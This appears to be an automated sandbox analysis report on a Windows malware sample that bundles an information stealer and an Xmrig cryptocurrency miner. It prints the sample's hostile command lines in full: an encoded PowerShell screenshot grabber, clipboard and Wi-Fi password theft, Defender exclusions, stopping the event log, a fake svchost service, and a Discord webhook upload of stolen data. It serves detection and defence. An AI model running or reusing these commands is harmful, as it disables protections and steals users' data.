G4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 1420, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7588, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\47SXvEQ.exe, ProcessId: 6956, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2944, TargetFilename: C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", ProcessId: 6164, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1136, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\ProgramData\Microsoft\svchost.exe, CommandLine: C:\ProgramData\Microsoft\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\Microsoft\svchost.exe, NewProcessName: C:\ProgramData\Microsoft\svchost.exe, OriginalFileName: C:\ProgramData\Microsoft\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\ProgramData\Microsoft\svchost.exe, ProcessId: 6024, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7592, ProcessName: sc.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 1420, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7716, ProcessName: cmd.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T21:01:26.329826+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.4	51716	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 47SXvEQ.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: 47SXvEQ.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 47SXvEQ.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: 47SXvEQ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: Built.exe
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Built.exe

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF6266483B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266492F0 FindFirstFileExW,FindClose,	4_2_00007FF6266492F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF6266618E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266492F0 FindFirstFileExW,FindClose,	5_2_00007FF6266492F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF6266618E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00007FF6266483B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	5_2_00007FFDF10C3229

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.4:57111 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.135.232 162.159.135.232

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic

Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51716 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Source: global traffic	DNS traffic detected: DNS query: blank-16pis.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1319333831601422477/Gz1lBx-zJ-f6c5VmTw7-Emfjq_tqsL0pI1D5turBQtQOU8FjLlkxesj3qj89-C61Kjse HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 729612User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=f3d0f4c2f8d39500f2ddb3ec81b69ca3

Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Built.exe, 00000004.00000003.1703519780.0000021148F00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

